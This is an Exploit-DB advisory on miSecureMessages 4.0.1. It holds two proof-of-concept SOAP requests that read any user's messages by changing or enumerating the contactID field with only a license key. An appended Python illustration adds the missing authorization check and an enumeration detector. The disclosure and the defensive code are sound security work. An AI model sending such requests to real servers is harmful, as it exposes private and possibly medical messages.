miSecureMessages 4.0.1 – Session Management / Authentication Bypass

  • Author: Jared Bird
    Date: 2014-04-25
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/33019/
  • Affected Product
    ==================================
    miSecureMessages from Amtelco - Tested on version: Client=4.0.1
    Server=6.2.4552.30017
    iOS: https://itunes.apple.com/us/app/misecuremessages/id423957478?mt=8
    android: https://play.google.com/store/apps/details?id=com.amtelco.secure
    website: https://misecuremessages.com/
    
    Product Description
    ==================================
    miSecureMessages is a secure, two-way instant smartphone and tablet
    messaging Android™ App that uses encryption to keep your messages private.
    Messages can be sent securely from device to device, and by using the
    secure cloud-based or on-site directory solution. When you receive a
    message from miSecureMessages, a Persistent Alert notifies you until you
    acknowledge the message. You can view the message, and quickly send a
    secure reply. miSecureMessages is perfect for healthcare and medical
    professionals to protect patient PHI, as well as industries that need
    secure instant messaging.
    
    Vulnerability Details
    ==================================
    ----------------------------------
    Session Management Vulnerability
    ----------------------------------
    
    miSecureMessages lacks any form of session management. Among other things,
    this allows any user to modify the XML requests and retrieve other users'
    messages.
    
    PoC(1):
    
    POST /msmwebservice/service.asmx HTTP/1.1
    Host: misecureserver.localhost.com
    Proxy-Connection: keep-alive
    Accept: */*
    Accept-Encoding: gzip, deflate
    Content-Type: text/xml; charset=utf-8
    Accept-Language: en-us
    SOAPAction: http://amtelco.com/ssm/GetMessages
    Connection: keep-alive
    User-Agent: miSecureMessages/4.0.1 CFNetwork/672.0.8 Darwin/14.0.0
    
    
    <?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
    <GetMessages xmlns="http://amtelco.com/ssm/">
    <folders>1</folders>
    <contactID>1</contactID>
    <unreadOnly>false</unreadOnly>
    <license>XXXX.X.XXXX</license>
    </GetMessages>
    </soap:Body>
    </soap:Envelope>
    
    Due to the lack of session management, it is possible to change the
    <contactID> value to any valid contact ID and retrieve all messages for the
    user associated with that contact ID.
    
    ----------------------------------
    Authentication bypass vulnerability
    ----------------------------------
    Authentication is not required to access messages; only a valid "license
    key" has to be supplied. By modifying the <contactID> value and enumerating
    it sequentially, it is possible to retrieve all messages without
    authenticating.
    
    PoC(2):
    
    POST /msmwebservice/service.asmx HTTP/1.1
    Host: misecureserver.localhost.com
    Content-Type: application/soap+xml; charset=utf-8
    Content-Length: 473
    
    <?xml version="1.0" encoding="utf-8"?>
    <soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
    <soap12:Body>
    <GetMessages xmlns="http://amtelco.com/ssm/">
    <license>XXXX.X.XXXX</license>
    <contactID>1</contactID>
    <unreadOnly>false</unreadOnly>
    <folders>1</folders>
    </GetMessages>
    </soap12:Body>
    </soap12:Envelope>
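    Defender-side illustration of both issues above (added here; not part of the
    advisory or of Amtelco's code): a parser for the GetMessages body in either
    SOAP version, the missing server-side check that binds <contactID> to an
    authenticated session (the session model is hypothetical), and a detection
    routine that flags one client requesting many distinct contact IDs, run over
    constructed request records.

```python
import xml.etree.ElementTree as ET

# Namespaces taken from the PoCs above: the GetMessages body element, and the
# SOAP 1.1 (PoC 1) and SOAP 1.2 (PoC 2) envelopes.
SSM_NS = "http://amtelco.com/ssm/"
SOAP_NS = ("http://schemas.xmlsoap.org/soap/envelope/",
           "http://www.w3.org/2003/05/soap-envelope")

def parse_get_messages(envelope_xml):
    """Return the GetMessages parameters (folders, contactID, ...) as a dict,
    accepting either SOAP envelope version. Raises ValueError otherwise."""
    root = ET.fromstring(envelope_xml)
    for ns in SOAP_NS:
        body = root.find("{%s}Body" % ns)
        if body is not None:
            break
    else:
        raise ValueError("not a SOAP envelope")
    call = body.find("{%s}GetMessages" % SSM_NS)
    if call is None:
        raise ValueError("not a GetMessages call")
    return {c.tag.split("}", 1)[-1]: (c.text or "").strip() for c in call}

def authorize_get_messages(envelope_xml, session_contact_id):
    """The server-side check the advisory says is absent: the contactID in the
    body must equal the contact bound to an authenticated session (hypothetical
    session binding). A license key alone never identifies a user."""
    if session_contact_id is None:
        return False
    return parse_get_messages(envelope_xml).get("contactID") == str(session_contact_id)

def flag_enumeration(requests, threshold=5):
    """Detection over (client_ip, envelope) records: one client requesting the
    messages of many distinct contactIDs is the enumeration pattern described
    under the authentication bypass. Returns the offending client IPs."""
    ids_by_client = {}
    for client_ip, envelope_xml in requests:
        cid = parse_get_messages(envelope_xml).get("contactID")
        ids_by_client.setdefault(client_ip, set()).add(cid)
    return {ip for ip, ids in ids_by_client.items() if len(ids) >= threshold}

def make_request(contact_id, soap12=False):
    """Constructed GetMessages envelope in the shape of the PoCs (no real data)."""
    ns = SOAP_NS[1] if soap12 else SOAP_NS[0]
    return ('<s:Envelope xmlns:s="%s"><s:Body><GetMessages xmlns="%s">'
            '<folders>1</folders><contactID>%s</contactID>'
            '<unreadOnly>false</unreadOnly><license>XXXX.X.XXXX</license>'
            '</GetMessages></s:Body></s:Envelope>' % (ns, SSM_NS, contact_id))
```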